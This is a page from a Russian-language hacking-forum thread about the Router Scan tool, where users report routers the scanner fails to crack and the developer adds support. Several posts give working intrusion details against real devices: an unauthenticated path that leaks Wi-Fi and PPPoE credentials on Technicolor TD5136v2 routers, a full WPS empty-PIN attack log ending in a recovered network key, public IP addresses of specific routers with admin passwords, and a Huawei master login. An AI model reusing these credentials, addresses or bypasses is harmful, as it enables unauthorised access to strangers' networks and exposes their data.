прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Оно не упирается, оно показывает статистику активных тредов. Дело в том, что на запуск одного потока необходимо определенное время(причем на каждой машине оно может быть разным) и при этом нельзя запустить мгновенно все потоки - они запускаются последовательно. Вот и получается, что когда запускается, к примеру, 250 поток, то первый поток давно отработал или сдох по таймауту. Если вам в активных тредах нужна такая же цифра, что и в количестве потоков, то увеличите таймаут. Только 750 из 1000 потоков, которые будут ждать ответ от несуществующих вебморд скорости сканирования не прибавят, хотя помогут разгрузить проц.

    Опубликуйте эксплоиты, возможно binarymaster их добавит.
     
    #4781 exzet, 28 Oct 2017
    Last edited: 28 Oct 2017
    AlexUnder2010 likes this.
  2. Hunter17

    Hunter17 New Member

    Joined:
    18 Feb 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Перезалейте пожалуйста на Яндекс , не качается, браузеры перепробовал менять. Благодарю.
     
  3. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    Всё прекрасно качается. В личку скинул на ЯД.
     
    Hunter17 likes this.
  4. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Те же самые грабли.(видимо и вправду глюк, а может так задумано).
    У нас, это точки вида: RT-WiFi_2A33 (7C:26:64:3D:2A:33).
    Это примерно, такой зверр: Airocon F@st 1744, v4, firmware: F1744R_V1.56_RTC_20E_832.
    Только видимо конфиг посвежее. Как басне про Лисицу и виноград. "И видит око, да зуб неймет"(c) И.А. Крылов. :)
    Их полно вокруг, но нет парса, WPS не сдаётся, а сбрутить хендшейк не получается.
    Не удалось нарватся на точку со сменённым провайдерским PSK(а он зверский).
     
    #4784 Kakoluk, 28 Oct 2017
    Last edited: 28 Oct 2017
  5. russstand

    russstand Banned

    Joined:
    5 Jan 2013
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    ну это не прога а вирус какойто :( ну какого она мою собственную точку разместила на карте? я даже не нажимал кнопку заливки на 3wifi, тока просканил 192.168.0-10,100,199.1,254 и всё, ну вот чо терь делать, mac засветил на карте, нафик так делать то :(
     
  6. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,347
    Likes Received:
    36,525
    Reputations:
    71
    Значит эту кнопку ты нажал при первом старте программы.
     
  7. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,049
    Likes Received:
    1,127
    Reputations:
    11
    Напишите автору пришлите ему наклейку с роутеру и он Ее удалит из базы. А вообще надо читать с чем соглашаетесь и учить иностранные языки. Это оградит вас от многих проблем)
     
    dragonking, Af5G4337, Mednik and 4 others like this.
  8. LolipopR

    LolipopR New Member

    Joined:
    1 Oct 2017
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Есть такое устройство TP-LINK_POCKET_3020_A335B6, с заводским пином, вот результат -
    18:d6:C7:A3:35:B6 TP-LINK_POCKET_3020_A335B6 WPA2 qwerty78 00000000 -21 dBm 1.0 Yes Wireless Router TL-MR3020 TP-LINK TL-MR3020 1.0
    Почему 8 нулей? В админке пин стоял другой. После того, как я пару раз его сгенерировал WPS - больше не смог подключиться.
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Hello! You can just post URLs of these routers, so I can add them.
    А вот тут вы неправы. Такая возможность есть, и для этого нужно знать документацию. :)
    На заметку: добавляю не только я. ;)
    Насколько я понял, так задумано. Пока кнопку PBC не нажмут, дальше M2 не пойдёт дело.
    У нас с этого года на 3WiFi, политика изменилась, валидные точки не удаляем.

    Два варианта - смириться, или сменить пароль на точке.
    Это вопрос к создателям прошивки... возможно была нажата кнопка PBC.
     
    Triton_Mgn, Payer and Alex Hilgert like this.
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Добавил.
     
  11. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    Поставщик..: Technicolor-Thomson
    Модель.....: TD5136v2
    Url........: $URL/index.cgi
    Описание...: RouterScan не пытается входить в систему с паролями по умолчанию.
    Пароль WiFi, а также логин PPPoE можно извлечь из $URL/wizardoi/ без аутентификации.
    Если вы входите в систему, вы можете извлечь всю информацию, загрузив файл конфигурации в $URL/mnt_config.cgi
    Справка....: https://www.shodan.io/search?query=HTTP/1.0+200+OK+binary:index.cgi


    Vendor.....: Technicolor-Thomson
    Model......: TD5136v2
    Url........: $URL/index.cgi
    Description: The RouterScan don't try to login with default passwords.
    The WiFi password as well as the PPPoE login can be extracted from $URL/wizardoi/ without authentication.
    If you login you can extract all of the information by downloading the config file at $URL/mnt_config.cgi
    Ref........: https://www.shodan.io/search?query=HTTP/1.0+200+OK+binary:index.cgi
     
  12. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Я имею ввиду, что в один и тот же момент времени нельзя запустить несколько потоков. Это не позволит сделать архитектура винды и процессора. Даже если их запускать из такого же числа дочерних потоков, то фактически процессор будет обрабатывать их запуск последовательно переключаясь между потоками, и это справедливо в том случае, когда количество потоков больше, чем количество ядер.
     
    binarymaster likes this.
  13. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Не знаю может баян..(поиск не указал)
    ESSID: MTSRouter_2D4374
    BSSID:
    Code:
    38:D8:2F:2D:43:74
    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M3.
    [*] E-Hash1: 98DC6D56437834F17FF6D8011313A43B8F4BF6D145A56454E3DD4876081F9851
    [*] E-Hash2: 98DC6D56437834F17FF6D8011313A43B8F4BF6D145A56454E3DD4876081F9851
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Received Identity Request.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: MTSRouter_2D4374
    [+] Key: 99jvxhph
    [+] Key Index: 1
    [*] Audit stopped.
    
    По видимому уязвим к пустому пину.
     
    hydra, Mednik, Triton_Mgn and 2 others like this.
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Добавил. ;)
     
    hydra, Mednik, Triton_Mgn and 2 others like this.
  15. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    Поставщик..: Intelbras
    Модель.....: WRN150 и другие
    вопрос: RouterScan показывает аутентификацию как «admin: admin» и не пытается использовать правильную комбинацию в списке слов, в результате мы не получаем никаких данных.
    Справка....: http://143.255.130.1:8181/

    Vendor.....: Intelbras
    Model......: WRN150 and others
    Issue......: RouterScan show authentication as "admin:admin" and doesn't try the correct combination in the wordlist, as result we get no data;
    Example....: http://143.255.130.1:8181/

    Authentication: admin:upup123
     
    #4795 Alex Hilgert, 28 Oct 2017
    Last edited: 28 Oct 2017
    hydra, Triton_Mgn, CRACK211 and 2 others like this.
  16. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    hydra, binarymaster and Alex Hilgert like this.
  17. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    У меня уже есть пропуск, см. Спойлер для лучшего понимания.
     
  18. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    binarymaster Кстати актуальный вопрос RS словарики auth_basic и auth_digest игнорирует хотя нужная пара логин пароль в них присутствует
     
    Alex Hilgert, buz00 and CRACK211 like this.
  19. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    При сканировании не парсит ключ сети, с модели SERCOMM RV6699, в веб интерфейсе звездочки, парсит только логин и пароль к вебке, больше не выдаёт никакой информации. http://95.165.174.73
    То же самое с Huawei Technologies HG8245H, не показывает ключ сети, парсит всё кроме вкладки Key, пишет <not accessible>, может из-за протокола https, https://95.165.172.251:80/index.asp
    Тут: http://95.165.171.247 прекрасно парсит, но модель роутера чуть отличается, на последную букву в названии модели, Huawei Technologies HG8245T.
     
    #4799 PSYDRUGS, 29 Oct 2017
    Last edited: 29 Oct 2017
    Ossen likes this.
  20. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    насчёт хуавей вбей в поле use cretentials пару telecomadmin NWTF5x%RaK8mVbD
     
    PSYDRUGS likes this.